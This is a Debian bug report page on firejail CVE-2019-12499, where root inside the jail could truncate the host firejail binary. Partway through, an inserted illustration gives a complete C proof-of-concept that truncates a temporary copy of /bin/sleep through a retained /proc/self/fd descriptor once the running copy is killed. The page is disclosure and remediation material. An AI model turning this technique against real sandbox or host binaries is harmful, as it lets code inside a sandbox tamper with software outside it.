firejail: CVE-2019-12499: binary can be truncated by root under certain conditions

Related Vulnerabilities: CVE-2019-12499, CVE-2019-5736

Debian Bug report logs - #929733


Reported by: Reiner Herrmann <reiner@reiner-h.de>

Date: Wed, 29 May 2019 17:24:02 UTC

Severity: important

Tags: fixed-upstream, security, upstream

Found in version firejail/0.9.58.2-1

Fixed in version firejail/0.9.58.2-2

Done: Reiner Herrmann <reiner@reiner-h.de>

Forwarded to https://github.com/netblue30/firejail/issues/2401



Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org:
Bug#929733; Package src:firejail. (Wed, 29 May 2019 17:24:04 GMT)


Acknowledgement sent to Reiner Herrmann <reiner@reiner-h.de>:
New Bug report received and forwarded. Copy sent to team@security.debian.org. (Wed, 29 May 2019 17:24:04 GMT)


Message #5 received at submit@bugs.debian.org:

From: Reiner Herrmann <reiner@reiner-h.de>
To: submit@bugs.debian.org
Subject: firejail: binary can be truncated by root under certain conditions
Date: Wed, 29 May 2019 19:19:51 +0200
Source: firejail
Version: 0.9.58.2-1
Severity: important
Tags: security upstream pending fixed-upstream
Forwarded: https://github.com/netblue30/firejail/issues/2401
X-Debbugs-CC: team@security.debian.org

Firejail is affected by an issue similar to CVE-2019-5736.

Under certain conditions the firejail binary outside the jail
can be truncated [0]:

> * The sandbox must be running exploit code.
> * The sandbox must be running as root.
> * The sandbox parent is killed instantly by an unhandled signal, i.e. something different from SIGTERM (kill <pid>) or SIGINT (ctrl+c). This cannot be done from inside the sandbox (because of the pid namespace), and also it cannot be done from the outside without root privileges. As only root him/herself is able to kill the sandbox in this way, this kind of attack is not relevant with regards to Firejail's SUID property.

This can also be exploited with firejail's --shutdown command:
> And that was wrong, --shutdown also had this problem (now fixed in shutdown.c)

I set severity to important, as it requires root privileges inside and outside
the jail to exploit it.

It is fixed in [1] (and amended in [2]), and in the new upstream release 0.9.60.
The earliest affected version is currently unknown.

I will upload the fix to unstable soon, together with #929732.

[0] https://github.com/netblue30/firejail/issues/2401
[1] https://github.com/netblue30/firejail/commit/fcba07c
[2] https://github.com/netblue30/firejail/commit/faa1ec7
[signature.asc (application/pgp-signature, inline)]
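The report above describes the condition but not the mechanism. As an added illustration (example code written for this page, not firejail's code, not part of the bug report, and not the upstream fix), the C program below reproduces the generic pattern the report compares to CVE-2019-5736: a process that only holds a read-only descriptor to a running executable is refused write access by the kernel (ETXTBSY), but as soon as every process executing that image is gone the same descriptor can be re-opened for writing through /proc/self/fd and the file on disk truncated to zero bytes. A throwaway copy of /bin/sleep stands in for the firejail binary, so file ownership replaces the root-in-root requirement and no privileges are needed; a SIGKILL of the child stands in for the sandbox parent being killed by an unhandled signal. The struct, function names and the temp-file path are the example's own assumptions.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Outcome of one run of the demonstration (names are this example's own). */
struct truncation_demo {
    int busy_errno;   /* errno of the write-open while the victim is running (expect ETXTBSY) */
    int truncated;    /* 1 if the retained descriptor could be re-opened for write afterwards */
    off_t size_after; /* on-disk size of the victim binary at the end (expect 0) */
};

/* Copy a real ELF binary into a fresh temp file owned by us. A copy of /bin/sleep
 * stands in for the firejail binary: ETXTBSY only protects images run via execve,
 * so an interpreted script would not show the effect. */
static int make_victim(char *path, size_t len) {
    const char *dir = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    snprintf(path, len, "%s/victim-XXXXXX", dir);
    int out = mkstemp(path);
    if (out < 0) return -1;
    int in = open("/bin/sleep", O_RDONLY);
    if (in < 0) in = open("/usr/bin/sleep", O_RDONLY);
    if (in < 0) { close(out); unlink(path); return -1; }
    char buf[1 << 16];
    ssize_t n;
    while ((n = read(in, buf, sizeof buf)) > 0) {
        if (write(out, buf, (size_t)n) != n) { n = -1; break; }
    }
    close(in);
    if (n < 0 || fchmod(out, 0755) < 0) { close(out); unlink(path); return -1; }
    close(out);
    return 0;
}

/* Start the victim and return only once it has actually execve'd: the CLOEXEC
 * pipe's read end sees EOF the moment the child's image is replaced. */
static pid_t start_victim(const char *path) {
    int sync[2];
    if (pipe2(sync, O_CLOEXEC) < 0) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        close(sync[0]);
        execl(path, path, "30", (char *)NULL); /* "sleep 30" keeps the image busy */
        int e = errno;
        if (write(sync[1], &e, sizeof e) < 0) {}
        _exit(127);
    }
    close(sync[1]);
    int e = 0;
    ssize_t got = read(sync[0], &e, sizeof e);
    close(sync[0]);
    if (got != 0) { waitpid(pid, NULL, 0); return -1; } /* exec failed */
    return pid;
}

/* The window the report describes: write access is refused while the binary runs,
 * and granted through the retained descriptor once the running copy is killed. */
struct truncation_demo run_truncation_demo(void) {
    struct truncation_demo r = { 0, 0, -1 };
    char path[256];
    if (make_victim(path, sizeof path) < 0) return r;

    /* "Inside the sandbox": a read-only handle taken while the binary is executing. */
    int held = open(path, O_RDONLY | O_CLOEXEC);
    pid_t victim = (held < 0) ? -1 : start_victim(path);
    if (victim < 0) { if (held >= 0) close(held); unlink(path); return r; }

    char link[64];
    snprintf(link, sizeof link, "/proc/self/fd/%d", held);

    /* Step 1: the kernel refuses write access to an image that is being executed. */
    int fd = open(link, O_WRONLY | O_TRUNC);
    if (fd >= 0) close(fd); else r.busy_errno = errno;

    /* Step 2: the process running the image dies "instantly" (SIGKILL, not SIGTERM). */
    kill(victim, SIGKILL);
    waitpid(victim, NULL, 0);

    /* Step 3: the same descriptor now re-opens for write and truncates the binary. */
    fd = open(link, O_WRONLY | O_TRUNC);
    if (fd >= 0) { r.truncated = 1; close(fd); }
    struct stat st;
    if (fstat(held, &st) == 0) r.size_after = st.st_size;

    close(held);
    unlink(path);
    return r;
}

int main(void) {
    struct truncation_demo r = run_truncation_demo();
    printf("write-open while running: %s\n",
           r.busy_errno == ETXTBSY ? "refused (ETXTBSY)" : "not refused");
    printf("truncated after SIGKILL: %s, size now %lld bytes\n",
           r.truncated ? "yes" : "no", (long long)r.size_after);
    return 0;
}
```

Build with `cc -o truncation_demo truncation_demo.c` and run it on Linux (it needs /proc and a copy-able /bin/sleep). The practical points for a firejail deployment follow from the three steps: a root process inside the jail only needs a descriptor to the host binary plus the moment at which no firejail process is left executing it, which is exactly what an unhandled signal to the sandbox parent (or, per the follow-up comment, --shutdown) provided before 0.9.58.2-2 / 0.9.60. After any such incident on an unpatched host, check the installed binary against the package (`debsums firejail`, or compare its size and hash with the .deb) rather than assuming the sandbox boundary held. For comparison, runc's own fix for CVE-2019-5736 re-executed a sealed in-memory copy of itself so that the container never saw the on-disk binary at all; this page does not say which approach the firejail commits took, so consult the two linked commits for that.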

Reply sent to Reiner Herrmann <reiner@reiner-h.de>:
You have taken responsibility. (Wed, 29 May 2019 19:36:05 GMT)


Notification sent to Reiner Herrmann <reiner@reiner-h.de>:
Bug acknowledged by developer. (Wed, 29 May 2019 19:36:05 GMT)


Message #10 received at 929733-close@bugs.debian.org:

From: Reiner Herrmann <reiner@reiner-h.de>
To: 929733-close@bugs.debian.org
Subject: Bug#929733: fixed in firejail 0.9.58.2-2
Date: Wed, 29 May 2019 19:33:31 +0000
Source: firejail
Source-Version: 0.9.58.2-2

We believe that the bug you reported is fixed in the latest version of
firejail, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 929733@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Reiner Herrmann <reiner@reiner-h.de> (supplier of updated firejail package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Format: 1.8
Date: Wed, 29 May 2019 21:06:42 +0200
Source: firejail
Architecture: source
Version: 0.9.58.2-2
Distribution: unstable
Urgency: high
Maintainer: Reiner Herrmann <reiner@reiner-h.de>
Changed-By: Reiner Herrmann <reiner@reiner-h.de>
Closes: 929732 929733
Changes:
 firejail (0.9.58.2-2) unstable; urgency=high
 .
   * Cherry-pick security fix for seccomp bypass issue. (Closes: #929732)
     Seccomp filters were writable inside the jail, so they could be
     overwritten/truncated. Another jail that was then joined with the first
     one had no seccomp filters applied.
   * Cherry-pick security fix for binary truncation issue. (Closes: #929733)
     When the jailed program was running as root, and firejail was killed
     from the outside (as root), the jailed program had the possibility to
     truncate the firejail binary outside the jail.
Checksums-Sha1:
 465593c08200ef411ce2efb628b62bd80e3b7cb8 2489 firejail_0.9.58.2-2.dsc
 62daa05a45c60c10b94fc3d03d29b4281a2d0713 13356 firejail_0.9.58.2-2.debian.tar.xz
 3afaf6ed7398611e20e6124c232f360eb0ea056f 5561 firejail_0.9.58.2-2_source.buildinfo
Checksums-Sha256:
 088a95f3ba986b97183b2654817e74c4c8659d9a9ad4a99dacfd8da74f48c73d 2489 firejail_0.9.58.2-2.dsc
 1e8aad6ea5cebea03fd96016a2d5be69c8b9fc72c782adf168d0dcdad8cc264e 13356 firejail_0.9.58.2-2.debian.tar.xz
 a532acf96c3d07ab05b0c001139d1e611a4d96ddb50d674ab71eb35964b2ea84 5561 firejail_0.9.58.2-2_source.buildinfo
Files:
 ecd8954cef22c1e8867682515b87c8fb 2489 utils optional firejail_0.9.58.2-2.dsc
 c54b379a0c10cb43da7db1ad7da49edb 13356 utils optional firejail_0.9.58.2-2.debian.tar.xz
 780d17157665f16ab58ff60cd549950d 5561 utils optional firejail_0.9.58.2-2_source.buildinfo





Changed Bug title to 'firejail: CVE-2019-12499: binary can be truncated by root under certain conditions' from 'firejail: binary can be truncated by root under certain conditions'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Fri, 31 May 2019 12:48:05 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 18:32:40 2019; Machine Name: beach
